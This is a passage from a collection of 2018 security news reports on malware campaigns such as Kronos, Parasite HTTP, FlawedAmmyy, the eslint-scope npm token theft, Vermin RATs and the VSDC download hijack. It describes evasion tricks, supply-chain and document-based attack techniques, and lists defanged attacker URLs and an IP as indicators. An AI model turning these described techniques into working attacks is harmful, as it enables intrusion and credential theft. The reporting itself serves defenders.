“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint says.
Kronos Banking Trojan resurrection, new campaigns spotted in the wild
28.7.2018 securityaffairs Virus
Researchers from Proofpoint have discovered a new variant of the infamous Kronos banking Trojan that was involved in several attacks in the recent months.
The infamous Kronos banking Trojan is back, and according to the experts from Proofpoint it was involved in several attacks in the last months.
The malware was first spotted in 2014 by researchers at security firm Trusteer that discovered an adv on the Russian underground market regarding a new financial Trojan dubbed Kronos.
The new variant was discovered in at least three distinct campaigns targeting Germany, Japan, and Poland respectively.
The new variants share many similarities with older versions:
Extensive code overlap
Same Windows API hashing technique and hashes
Same string encryption technique
Extensive string overlap
Same C&C encryption mechanism
Same C&C protocol and encryption
Same webinject format (Zeus format)
Similar C&C panel file layout
“Some of the features highlighted in the ad (written in C++, banking Trojan, uses Tor, has form grabbing and keylogger functionality, and uses Zeus-formatted webinjects) overlap with features we observed in this new version of Kronos.” continues the analysis.
“The ad mentions the size of the bot to be 350 KB which is very close to the size (351 KB) of an early, unpacked sample of the new version of Kronos we found in the wild [8]. This sample was also named “os.exe” which may be short for “Osiris”.”
Since April 2018, experts discovered new samples of a new variant of the Kronos banking Trojan in the wild. The most important improvement is represented by the command and control (C&C) mechanism that leverages the Tor anonymizing network.
“There is some speculation and circumstantial evidence suggesting that this new version of Kronos has been rebranded “Osiris” and is being sold on underground markets.” states the analysis published by Proofpoint.
A first campaign was observed on June 27, the malware was targeting German users with weaponized documents attached to spam emails. The macros included in the document was used as downloader for the payload, in some cases, the SmokeLoader downloader.
A second campaign was uncovered on July 13, the victims were infected through a malvertising campaign. The malicious ads pointed out to a website that thanks to JavaScript injections redirected visitors to the RIG exploit kit, that delivered SmokeLoader. The downloader would deliver the Kronos onto the compromised machines.
A third campaign was observed since July 15 and sees victims receiving fake invoice emails carrying weaponized documents that attempted to exploit the CVE-2017-11882 vulnerability to deliver and execute the Kronos Trojan.
The experts highlighted that the malware leveraged webinjects in the German and Japanese campaigns, but they weren’t involved in the attacks on Poland.
The fourth campaign started on July 20 and according to the experts it is still ongoing.
“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape.” Proofpoint concludes.
“While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,”
Parasite HTTP RAT implements a broad range of protections and evasion mechanims
28.7.2018 securityaffairs Virus
Researchers from Proofpoint have discovered a new remote access Trojan (RAT) named Parasite HTTP that implements a broad range of evasion techniques.
The Parasite HTTP RAT has a modular architecture that allows authors to easily add new features. The malware includes sandbox detection, anti-debugging, anti-emulation, and other defense mechanisms.
“Proofpoint researchers recently discovered a new remote access Trojan (RAT) available for sale on underground markets. The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections.” reads the analysis published by Proofpoint.
“The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.”
The Parasite HTTP RAT leverages string obfuscation and a sleep routine to delay execution and check for sandboxes or emulate environments. It first checks if an exception handler has run, then it checks whether between 900ms and two seconds elapsed in response to the routine’s 1-second sleep split into 10ms increments.
“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” states Proofpoint
In presence of a sandbox, the RAT halts the execution and attempts to make hard the forensic investigations.
“When Parasite HTTP actually does detect a sandbox, it attempts to hide this fact from any observers. It does not simply exit or throw an error, instead making it difficult for researchers to determine why the malware did not run properly and crashed. ” continues the analysis.
Experts observed the malware using code from a public repository for sandbox detection.
The Parasite HTTP RAT is being advertised on an underground forum. Researchers already spotted the threat in attacks in the wild.
The malware was involved in a small email campaign targeting organizations primarily in the information technology, healthcare, and retail industries.
The phishing emails used weaponized Microsoft Word attachments with macros that act as a downloader for the RAT
The Parasite HTTP RAT is written in C programming language. The author claims it has a small size (49kb) and has he no dependencies.
It also implements plugin support and dynamic API calls support.
Communication with the command and control (C&C) is encrypted, the author also offers a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.
It is interesting to note that the malware involves a rare process injection technique. On Windows 7 and newer versions, the malware resolves critical APIs to create registry entries.
The experts highlighted that the Parasite HTTP RAT includes an obfuscated check for debugger breakpoints it also removes hooks on a series of DLLs to complicate the work of malware experts while investigating the threat.
“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint concludes.
Kronos Banking Trojan Has Returned
26.7.2018 securityweek Virus
The Kronos banking Trojan is showing renewed strength and has been very active over the past several months, Proofpoint security researchers warn.
Kronos malware was first discovered in 2014 and maintained a steady presence on the threat landscape for a few years, before largely disappearing for a while. It uses man-in-the-browser (MiTB) attacks and webinjects to modify accessed web pages and steal user credentials, account information, and other data. It can also log keystrokes and has hidden VNC functionality.
Last year, the United States Federal Bureau of Investigation said that Kronos was built and distributed by British researcher Marcus Hutchins, who goes by the online handle of MalwareTech and who is known for stopping the WannaCry ransomware attack.
The new Kronos samples, which were observed in campaigns targeting users in Germany, Japan, and Poland, are connecting to a command and control (C&C) domain on the Tor network. There’s also speculation that the malware might have been rebranded to Osiris, but no hard evidence on this has emerged so far.
The first campaign carrying the new Kronos samples was observed on June 27, targeting German users with malicious documents attached to spam emails. The documents carried macros to download and execute the malware and the SmokeLoader Trojan downloader was used in some cases.
Targeting Japan, the second campaign was observed on July 13 and involved a malvertising chain. Malicious ads took users to a site where JavaScript injections redirected to the RIG exploit kit, which delivered SmokeLoader. The downloader would then drop Kronos onto the compromised machines.
The Poland campaign started on July 15 and involved fake invoice emails carrying malicious documents that attempted to exploit CVE-2017-11882 (the Equation Editor vulnerability) to download and execute Kronos.
The Kronos samples observed in all three campaigns were configured to use .onion domains for C&C purposes. The researchers also observed that webinjects were used in the German and Japanese campaigns, but none was seen in the attacks on Poland.
A fourth campaign observed on July 20 appeared to be work in progress. The Kronos samples were once again configured to use the Tor network and a test webinject was spotted.
The 2018 Kronos samples feature extensive code and string overlap with the older versions, abuse the same Windows API hashing technique and hashes and the same string encryption technique, leverage the same webinject format, and feature the same C&C encryption mechanism and C&C protocol and encryption.
The C&C panel file layout is also similar to the older variants and a self-identifying string is also present in the malware. The major change, however, is the use of .onion C&C URLs and the Tor network to anonymize communications.
There is also some evidence to suggest that the malware might have been rebranded to Osiris (the Egyptian god of rebirth).
The new malware is being advertised on underground forums as packing capabilities that overlap with those observed in the new version of Kronos and as having about the same size (at 350 KB), and the researchers also observed a filenaming scheme in Kronos that appears to suggest a connection with Osiris.
“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape. […] While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,” Proofpoint concludes.
TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT
22.7.2018 securityaffairs Virus
Proofpoint uncovered a massive malspam campaign leveraging emails delivering weaponized PDF documents containing malicious SettingContent-ms files.
Security experts from Proofpoint have uncovered a massive malspam campaign, crooks sent hundreds of thousands of emails delivering weaponized PDF documents containing malicious SettingContent-ms files.
Experts attributed the malspam campaign to the cybercriminal group tracked as TA505, the attackers are spreading the FlawedAmmyy RAT.
The SettingContent-ms file format was implemented in Windows 10 to allows a user to create “shortcuts” to various Windows 10 setting pages.
Thi file opens the Control Panel for the user [control.exe], experts noticed that it includes the <DeepLink> element in the schema.
SettingContent-ms files
This element takes any binary with parameters and executes it, this means that an attacker can substitute ‘control.exe’ with a malicious script that could execute any command, including cmd.exe and PowerShell, without user interaction.
“After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.” wrote experts from Specterops.
“The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” to something like “cmd.exe /c calc.exe”?”
Experts noticed that maliciously SettingContent-ms file can bypass Windows 10 security mechanisms such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.
In June experts from SpecterOps monitored several campaigns abusing the SettingContent-ms file format within Microsoft Word documents, but only a few days ago Proofpoint experts noticed threat actors leveraging PDF documents.
“Colleagues at SpecterOps recently published research[1] on abuse of the SettingContent-ms file format. Crafted SettingContent-ms files can be used to bypass certain Windows 10 defenses such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.” reads the analysis published by Proofpoint.
“We first observed an actor embedding SettingContent-ms inside a PDF on June 18. However, on July 16 we observed a particularly large campaign with hundreds of thousands of messages attempting to deliver PDF attachments with an embedded SettingContent-ms file.”
Once the victim has opened the PDF file, Adobe Reader will display a warning message asking the user if they want to open the file, since it is attempting to run the embedded “downl.SettingContent-ms” via JavaScript. Experts noticed that the warning message is displayed for any file format embedded within a PDF, not only for SettingContent-ms files.
If the victim clicks the “OK” prompt, the PowerShell command included in the <DeepLink> element downloads and execute the FlawedAmmyy RAT.
The FlawedAmmyy RAT has been active since 2016, it borrows the code of the Ammyy Admin remote access Trojan.
FlawedAMMYY implements common backdoor features, it allows attackers to manage files, capture the screen, remote control the machine, establish RDP SessionsService, and much more.
Experts attributed the malspam campaign to the TA505 threat actor based on email messages, as well as the payload.
The TA505 operates on a large scale, it was behind other major campaigns leveraging the Necurs botnet to deliver other malware, including the Locky ransomware, the Jaff ransomware, and the Dridex banking Trojan.
“Whether well established (like TA505) or newer to the space, attackers are quick to adopt new techniques and approaches when malware authors and researchers publish new proofs of concept. While not all new approaches gain traction, some may become regular elements through which threat actors rotate as they seek new means of distributing malware or stealing credentials for financial gain.” concludes Proofpoint researchers, “In this case, we see TA505 acting as an early adopter, adapting the abuse of SettingContent-ms files to a PDF-based attack delivered at significant scale.”
Mobile Malware Campaign targets users in India through rogue MDM service
19.7.2018 securityaffairs Virus
Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware distributed through a bogus MDM service
Security experts from Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware that has been active at least since August 2015. The researchers believe that cyberspies are operating from China and they found spying on 13 selected iPhones in the same country.
Attackers were abusing a mobile device management (MDM) service that normally allows large enterprises to control devices being used by the employees and enforce policies.
The access to the MDM service used by a company could allow an attacker to control employees’ devices and deploy malware and the targeted devices.
“Cisco Talos has identified a highly targeted campaign against 13 iPhones which appears to be focused on India. The attacker deployed an open-source mobile device management (MDM) system to control enrolled devices.” reads the analysis published by Cisco Talos.
“At this time, we don’t know how the attacker managed to enroll the targeted devices. Enrollment could be done through physical access to the devices, or most likely by using social engineering to entice a user to register”
To enroll an iOS device into the MDM service requires a user to manually install enterprise development certificate. Enterprises can obtain such kind of certificates through the Apple Developer Enterprise Program.
Enterprise can deliver MDM configuration file through email or a webpage for over-the-air enrollment service using the Apple Configurator.
“MDM uses the Apple Push Notification Service (APNS) to deliver a wake-up message to a managed device. The device then connects to a predetermined web service to retrieve commands and return results,” reads Apple about MDM.
Cisco’s Talos experts believe that attackers used either social engineering techniques, such as a fake tech support-style call or gaining in some way a physical access to the targeted devices.
The threat actors behind this campaign used the BOptions sideloading technique to inject malicious code to legitimate apps, including the messaging apps WhatsApp and Telegram that were then deployed through the MDM service onto the 13 targeted devices in India.
The BOptions sideloading technique allowed the attacker to inject a dynamic library in the application that implements spyware capabilities. The malicious code allows that attacker of collecting and exfiltrating information from the targeted device, including the phone number, serial number, location, contacts, user’s photos, SMS and Telegram and WhatsApp chat messages.
It is still a mystery how attackers tricked victims into installing a certificate authority on the iPhone and how they added the 13 targeted iPhones into their rogue MDM service.
Exfiltrated data and information about the compromised devices were sent to a remote server located at hxxp[:]//techwach[.]com
Among the tainted apps used by the attackers, there was also PrayTime, an application that notifies users when it is time to pray.
“Talos identified another legitimate app executing malicious code during this campaign in India. PrayTime is used to give the user a notification when it’s time to pray,” continues the analysis.
“The purpose is to download and display specific ads to the user. This app also leverages private frameworks to read the SMS messages on the device it is installed on and uploads these to the C2 server.”
Talos was not able to attribute the attack to a specific actor either which are its motivations, they were only able to find evidence suggesting the attackers were operating from India. Experts noticed that attackers planted a “false flag” by posing as a Russian threat actor.
“The certificate was issued in September 2017 and contains an email address located in Russia. Our investigation suggests that the attacker is not based out of Russia. We assume this is a false flag to point researchers toward the idea of a “classical Russian hacker.” False flags are becoming more common in malware, both sophisticated and simple. It’s an attempt to muddy the waters for the analysts/researchers to direct blame elsewhere.” continues the analysis.
Talos shared its findings with Apple that quickly revoked 3 certificates used in this campaign.
Further details, including IoCs are reported in the analysis shared by Talos.
Crooks deployed malicious ESLint packages that steal software registry login tokens
19.7.2018 securityaffairs Virus
Hackers compromised the npm account of an ESLint maintainer and published malicious versions of eslint packages to the npm registry.
Crooks compromised an ESLint maintainer’s account last week and uploaded malicious packages that attempted to steal login tokens from the npm software registry. npm is the package manager for JavaScript and the world’s largest software registry.
ESLint is open source “pluggable and configurable linter tool” for identifying and reporting on patterns in JavaScript, it was created by Nicholas Zakas.
The affected packages hosted on npm are:
eslint-scope version 3.7.2 o, a scope analysis library used by older versions of eslint, and the latest versions of babel-eslint and webpack.
eslint-config-eslint version 5.0.2 is a configuration used internally by the ESLint team.
Once the tainted packages are installed, they will download and execute code from pastebin.com that was designed to grab the content of the user’s .npmrc file and send the information to the attacker. This file usually contains access tokens for publishing to npm.
“The attacker modified package.json in both eslint-escope@3.7.2 and eslint-config-eslint@5.0.2, adding a postinstall script to run build.js. This script downloads another script from Pastebin and evals its contents.” wrote Henry Zhu about the eslint-scope attack.
“The script extracts the _authToken from a user’s .npmrc and sends it to histats and statcounter inside the Referer header,”
The packages were quickly removed once they were discovered by maintainers and the content on pastebin.com was taken down.
“On July 12th, 2018, an attacker compromised the npm account of an ESLint maintainer and published malicious versions of the eslint-scope and eslint-config-eslint packages to the npm registry. On installation, the malicious packages downloaded and executed code from pastebin.com which sent the contents of the user’s .npmrc file to the attacker.” reads the security advisory published by ESLint.
“An .npmrc file typically contains access tokens for publishing to npm. The malicious package versions are eslint-scope@3.7.2 and eslint-config-eslint@5.0.2, both of which have been unpublished from npm. The pastebin.com paste linked in these packages has also been taken down.”
The npm login tokens grabbed by malicious packages don’t include user’s npm password, but npm opted to revoke possibly impacted tokens. Users can revoke existing tokens as suggested by npm.
“We have now invalidated all npm tokens issued before 2018-07-12 12:30 UTC, eliminating the possibility of stolen tokens being used maliciously. This is the final immediate operational action we expect to take today.” reads the npm’s incident report.
Further investigation allowed the maintainers to determine that the account was compromised because the ower had reused the same password on multiple accounts and also didn’t enabled two-factor authentication on their npm account.
ESLint released eslint-scope version 3.7.3 and eslint-config-eslint version 5.0.3.
Users who installed the malicious packages need to update npm.
QUASAR, SOBAKEN AND VERMIN RATs involved in espionage campaign on Ukraine
19.7.2018 securityaffairs Virus
Security experts from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions and involving three different RATs, including the custom-made VERMIN.
Security researchers from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions, attackers used at least three different remote access Trojans (RATs).
The campaign was first spotted in January by experts from PaloAlto Networks when the researchers discovered a new piece of malware tracked VERMIN RAT targeting Ukraine organizations.
“Pivoting further on the initial samples we discovered, and their infrastructure, revealed a modestly sized campaign going back to late 2015 using both Quasar RAT and VERMIN.” reads the report from PaloAlto Networks.
Back to the present, the experts discovered that the attackers used several RATs to steal sensitive documents, the researchers collected evidence of the involvement of the Quasar RAT, Sobaken RAT, and Vermin.
The Quasar RAT is available for free on GitHub, many other attackers used it in their campaigns, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats. Sobaken is an improved version of Quasar RAT, that includes several anti-sandbox and other evasion mechanisms.
The RATs have been used against different targets at the same time, experts noticed they share some infrastructure and connect to the same C&C servers.
The threat actors don’t have advanced skills, their attack vector is spear phishing messages and they have been quite successful in using social engineering to lure victims into opening the email and downloading and executing the malicious codes.
“Even though these threat actors don’t seem to possess advanced skills or access to 0-day vulnerabilities, they have been quite successful in using social engineering to both distribute their malware and fly under the radar for extended periods of time.” Reads the analysis published by ESET.
“We were able to trace attacker activity back to October 2015; however, it is possible that the attackers
have been active even longer. These attackers use three different .NET malware strains in their attacks – Quasar RAT, Sobaken (a RAT derived from Quasar) and a custom-made RAT called Vermin. All three malware strains have been in active use against different targets at the same time, they share some infrastructure and connect to the same C&C servers.”
Some emails carried weaponized Word documents attempting to exploit CVE-2017-0199, attackers used a dropper masquerades as a legitimate software (i.e. Adobe, Intel or Microsoft) to deliver the final payload.
The threat actors used a scheduled task that executes the malware every 10 minutes to achieve persistence on the infected machine.
“The installation procedure is the same for all three malware strains used by these attackers. A dropper drops a malicious payload file (Vermin, Quasar or Sobaken malware) into the %APPDATA% folder, in a subfolder named after a legitimate company (usually Adobe, Intel or Microsoft).” continues the report.
“Then it creates a scheduled task that runs the payload every 10 minutes to ensure its persistence.”
Since mid-2017, the threat actors adopted steganography to bypass content filtering by hiding the payloads in images that were hosted on the free image hosting websites saveshot.net and ibb.co.
The malicious code executed only on hosts where the Russian or Ukrainian keyboard layouts are installed, it also checks the IP address and the username on the target machine.
To avoid automated analysis systems, that often use tools like Fakenet-NG where all DNS/HTTP communication succeeds and returns some result, the malware generates a random
website name/URL and attempt to connect it. If the connection fails in some cases the system could be considered real and not a virtualized environment used by researchers.
“Among the many different malware attacks targeted at high value assets in Ukraine, these attackers haven’t received much public attention – perhaps because of their initial use of open-source-based malware before developing their own strain (Vermin).” concludes the report.
“Employing multiple malware families, as well as various infection mechanisms – including common social engineering techniques but also not-so-common steganography – over the past three years, could be explained by the attackers simply experimenting with various techniques and malware, or it may suggest operations by multiple subgroups.”
Further details on the campaign, including the IoCs are included in the report.
Malware Creator Admits to Building and Selling LuminosityLink RAT
19.7.2018 securityweek Virus
A Kentucky man admitted in a U.S. court to developing and distributing the remote access Trojan known as LuminosityLink.
21-year-old Colton Ray Grubbs of Stanford, Kentucky, pleaded guilty to developing the malware and selling it to thousands of people, knowing it would be used for computer intrusion, according to court documents.
Also known as Luminosity, the LuminosityLink RAT was first spotted in April 2015, providing its users with surveillance capabilities such as remote desktop and webcam and microphone access; a smart keylogger that could target specific programs; a crypto-currency miner; and distributed denial of service (DDoS) features.
In early February 2018, Europol and the UK’s National Crime Agency (NCA) announced an operation specifically targeting the sellers and users of Luminosity, but security researchers revealed soon after that the malware itself had been retired for over half a year.
According to the plea agreement obtained by investigative journalist Brian Krebs (PDF), Grubbs, who used the online handle of KFC Watermelon, admitted to have designed and sold LuminosityLink at $39.99 to over 6,000 customers between April 2015 and July 2017.
The malware was being distributed via the luminosity.link website and through the HackForums.net forum. Although he claimed the tool had legitimate purposes, being designed for system administration, the developer was touting capabilities that would allow potential customers to access and control systems without the legitimate owners’ knowledge or permissions.
According to the document filed in court, the hacker emphasized that the malware could be installed remotely without notification, as well as its keylogging and surveillance capabilities, file exfiltration functionality, the ability to steal login credentials, crypto-mining and DDoS features, and the ability to prevent detection and removal attempts from anti-malware software.
The document also claims that Grubbs was offering free support to customers, sending private messages to respond to “questions about accessing and controlling victim computers without authorization or detection.” He also admitted to recruiting other people to sell the malware as affiliates.
In July 2017, after learning the Federal Bureau of Investigation would raid his apartment, Grubbs warned the PayPal user who was collecting LuminosityLink payments, asked his roommate to hide a laptop in his car, and also concealed a debit card associated with his Bitcoin account and a phone storing his Bitcoin information.
“Defendant removed the hard drives from his desktop computer and removed them from his apartment before the authorized search so that they would not be seized by the government. Three days later, Defendant transferred over 114 bitcoin from his LuminosityLink bitcoin address into six new bitcoin addresses,” the plea agreement reads.
Overall, the hacker pleaded guilty to three counts, two of which carry maximum sentences of 5 years in prison and a fine of up to $250,000 each, while the third carries a maximum sentence of 20 years in prison and a fine of no more than $500,000.
RATs Bite Ukraine in Ongoing Espionage Campaign
19.7.2018 securityweek Virus
An ongoing espionage campaign aimed at Ukraine is leveraging three different remote access Trojans (RATs), ESET security researchers warn.
The attacks apparently started in late 2015, but the first report on them emerged in January 2018. ESET says they have been tracking the campaign since mid-2017, and that the attacks have been mainly focused on Ukrainian government institutions, with a few hundred victims in different organizations.
The actors behind this cyber-espionage campaign have been using multiple stealthy RATs to exfiltrate sensitive documents, namely Quasar RAT, Sobaken RAT, and a custom-made RAT called Vermin.
The attackers, which appear to lack advanced skills and access to zero-day vulnerabilities, are using emails and social engineering to distribute the malware. Some emails carried Word documents attempting to exploit CVE-2017-0199, a vulnerability patched in April 2017.
A dropper is usually used to deliver the final payload (which masquerades as software form Adobe, Intel or Microsoft) to the %APPDATA% folder and to achieve persistence via a scheduled task that executes the malware every 10 minutes. Steganography was also employed to trick content filtering, accordnig to a whitepaper (PDF) published by ESET.
To avoid automated analysis systems and sandboxes, the malware checks if the Russian or Ukrainian keyboard layouts are installed and terminates itself if none is found. It also checks the system’s IP address and the username on the machine. Moreover, it checks if the connection to a randomly generated website name/URL fails, as would be expected on a real system.
An open-source backdoor, Quasar RAT can be freely downloaded from GitHub and has been employed by the actors behind this campaign since at least October 2015. Other groups have been using the malware in their attacks as well, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats.
Sobaken is a heavily modified version of Quasar RAT, with removed functionality to make the executable smaller, but also with several anti-sandbox and other evasion tricks added.
Vermin RAT, on the other hand, is a custom-made backdoor that first emerged in mid-2016 and which continues to be used. Written in .NET, it is protected using ConfuserEx and uses Vitevic Assembly Embedder, free software for embedding required DLLs into the main executable.
The malware includes support for screen capturing, reading directory contents, file upload/download/deletion/renaming, process monitoring and termination, shell execution, run keylogger, folder manipulation, audio capture, and bot update.
Most of the commands are implemented in the main payload, but the RAT also includes support for optional components, such as audio recorder, keylogger, password stealer, and USB file stealer.
“These attackers haven’t received much public attention compared to others who target high-profile organizations in Ukraine. However, they have proved that with clever social engineering tricks, cyber-espionage attacks can succeed even without using sophisticated malware. This underscores the need for training staff in cybersecurity awareness, on top of having a quality security solution in place,” ESET notes.
VPNFilter Malware Hits Critical Infrastructure in Ukraine
18.7.2018 securityweek Virus
The Security Service of Ukraine (SBU) revealed this week that the VPNFilter malware, which it attributed to Russian intelligence agencies, had targeted a critical infrastructure organization.
According to the SBU, the malware was detected on the systems of the Aulska chlorine station in Auly, Dnipropetrovsk. The organization is part of the country’s critical infrastructure as it supplies chlorine to water treatment and sewage plants across Ukraine.
The malware reportedly targeted technological processes and safety systems, but the security agency said it quickly detected and blocked the attempt. The SBU said the attack could have resulted in technological process disruptions or a crash of the affected systems, which could have led to a “disaster.” The agency believes the attackers’ goal was to disrupt operations at the facility.
While the SBU’s statement suggests that this attack was specifically aimed at the chlorine station, it’s also possible that the organization was an opportunistic target. VPNFilter at one point had ensnared at least 500,000 routers and network-attached storage (NAS) devices and Ukraine appears to be its main target.
Even after U.S. authorities disrupted VPNFilter by seizing one of its command and control (C&C) domains, researchers reported that the threat had continued to target devices in Ukraine.
The fact that Ukraine has attributed the VPNFilter attack to Russia is not surprising. Even the United States government has linked the operation to some cyber-espionage groups believed to be sponsored by the Kremlin.
The VPNFilter botnet, whose existence was brought to light in May, targets more than 50 types of routers and NAS devices from Linksys, MikroTik, Netgear, TP-Link, QNAP, ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.
The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.
This is not the first time an attack that targets Ukraine has been blamed on Russia. Moscow has also been accused of launching the NotPetya attack and campaigns aimed at Ukraine’s power grid.
Hackers Using Stolen D-Link Certificates for Malware Signing
12.7.2018 securityweek Virus
A cyber-espionage group is abusing code-signing certificates stolen from Taiwan-based companies for the distribution of their backdoor, ESET reports.
The group, referred to as BlackTech, appears highly skilled and focused on the East Asia region, particularly Taiwan. The certificates, stolen from D-Link and security company Changing Information Technology Inc., have been used to sign the Plead backdoor, ESET's security researchers say.
The Plead campaign is believed to have been active since at least 2012, often focused on confidential documents and mainly targeting Taiwanese government agencies and private organizations.
Evidence of the fact that the D-Link certificate was stolen comes from the fact that it was used to sign non-malicious D-Link software, not only the Plead malware, ESET explains.
After being informed on the misuse of its certificate, D-Link revoked it, along with a second certificate, on July 3. In an advisory, the company said that most of its customers should not be affected by the revocation.
“D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong,” the company said.
Changing Information Technology Inc., also based in Taiwan, revoked the misused certificate on July 4, but the threat actor continued to use it for malicious purposes even after that date, ESET reveals.
The signed malware samples also contain junk code for obfuscation purposes, but all perform the same action: they either fetch from a remote server or open from the local disk encrypted shellcode designed to download the final Plead backdoor module.
The malware can steal passwords from major web browsers, such as Chrome, Firefox, and Internet Explorer, and from Microsoft Outlook.
According to Trend Micro, the Plead backdoor can also list drives, processes, open windows and files on the compromised machine, can open remote shell, upload files, execute applications via ShellExecute API, and delete files.
“Misusing digital certificates is one of the many ways cybercriminals try to mask their malicious intentions – as the stolen certificates let malware appear like legitimate applications, the malware has a greater chance of sneaking past security measures without raising suspicion,” ESET notes.
The use of code-signing certificates for malware delivery isn’t a novel practice, and the Stuxnet worm, which was discovered in 2010, is a great example of how long threat actors have been engaging in such practices. The first to target critical infrastructure, Stuxnet used digital certificates stolen from RealTek and JMicron, well-known Taiwanese tech companies.
Popular software VSDC official website was hacked and used to distribute malware
12.7.2018 securityaffairs Virus
Hackers have compromised the website of VSDC, (http://www.videosoftdev.com), a popular company that provides free audio and video conversion and editing software.
Experts from Chinese security firm Qihoo 360 Total Security discovered that attackers hijacked the download links of the popular audio and video editor, VSDC.
The experts discovered that hackers hijacked download links on the websites in three different periods, the links were pointing to servers they were operating.
The attackers gained access to the administrative server part of the site and replaced the links to the distribution file of the program.
The experts discovered that attacks were registered from an IP address in Lithuania – 185[.]25.51.133.
“360 Security Center discovered the download links of a famous audio and video editor, VSDC (http://www.videosoftdev.com), has been hijacked in official website. The computer will be injected by theft Trojan, keylogger and remote control Trojan after the program is downloaded and installed.” reads the analysis published by Qihoo 360 Total Security.
Below the details of the three different attacks:
June 18 – Hackers substituted download links with hxxp://5.79.100.218/_files/file.php
July 2 – Hackers substituted download links with hxxp://drbillbailey.us/tw/file.php
July 6 – Hackers substituted download links with hxxp://drbillbailey.us/tw/file.php
VSDC confirmed the incident and fixed the links on its website.
The first and third periods affected the most users that were infected with three different pieces of malware.
VSDC users were receiving a JavaScript file disguised as VSDC software that acted as a downloader for a PowerShell script, which, in turn, would download three malicious payloads, an infostealer, a keylogger, and a remote access trojan (RAT).
The infostealer hijacks sensitive information including Telegram account / password, Steam account / password, Skype chat log, Electrum wallet and screenshot from victims’ machine. Data are sent back to hxxp://system-check.xyz/index.php.
The keylogger records all keyboard actions and sends the record to hxxp://wqaz.site/log/index.php.
The third file is a Hidden VNC remote control Trojan that could be used by attackers to control the infected PC.
The security researcher Ivan Korolev from Dr.Web revealed that the third file is a version of DarkVNC, a lesser known RAT.
BleepingComputer
✔
@BleepinComputer
· 22h
Popular Software Site Hacked to Redirect Users to Keylogger, Infostealer, More - by @campuscodihttps://www.bleepingcomputer.com/news/security/popular-software-site-hacked-to-redirect-users-to-keylogger-infostealer-more/ …
Ivan Korolev
@fe7ch
The third trojan that is screenshoted by Qihoo is DarkVNC, not a TVRAT or SpyAgent. However, they might have replaced the file before it was analyzed by @malwrhunterteam
9:05 AM - Jul 12, 2018
See Ivan Korolev's other Tweets
Twitter Ads info and privacy
“This domain name hijacking is a global attack and has affected more than thirty countries. It is more likely to be a Supply Chain Attack instead of a local network hijacking.” continues the analysis.
“On behalf of VSDC team we’d like to inform our users that the attacks have been stopped and all the vulnerabilities detected and removed”
1. All the source files of the site have been restored, the fake ones have been deleted.
All the passwords have been changed. As our practice has shown, 10-12 character passwords made of random characters are not complex enough, so they have their length significantly increased.
2. Two-level authentication of access to the administrative part at the IIS server level was introduced.
3. On the server currently there is a utility that checks all files for validity.
Smart Speaker Banking Is Coming to a Device Near You, But Is It Secure?
11.7.2018 securityaffairs Virus
Smart speaker Banking Is coming to a device near you, Which are the cyber risks associated with their use? Are they a new opportunity for attackers?
The popularity of voice-activated smart speakers like the Google Home and Amazon Echo has made brands, and industries realize there’s adequate demand for introducing technology that lets people accomplish things just by speaking.
They can order items, check traffic in their areas and search for information, among other conveniences.
Soon, smart speaker owners can take care of their banking needs. Should you consider taking that approach, too?
Check Balances and Pay Credit Card Bills
Regional brand U.S. Bank is the first establishment in the financial industry to unveil online banking opportunities that work with all three virtual assistants — Alexa, Google Assistant and Siri — making it relevant to a significant segment of the market.
After a soft launch, U.S. Bank started marketing the option to its customers in June 2018. For now, customers can check their account balances and make credit card or mortgage payments. The brand is also reportedly considering letting people transfer money to other account holders.
Also, smaller banks and credit unions offer similar functionality. Capital One and American Express let people pay bills through their smart speakers, too.
Smart Speakers Could Reveal Private Details
Most skills for the Amazon Echo that emphasize productivity give audible information to users. The idea is that they can do things without fumbling with their phones or otherwise using their hands.
The banking apps that work with Amazon and Google smart speakers give information through spoken responses to verbal prompts.
In contrast, people using Apple’s Siri assistant can do some banking tasks with iOS apps that support Siri, but they only see their information displayed on screens. Banking skills are not available on Apple’s HomePod speaker yet, and the company hasn’t divulged if they’re on the horizon.
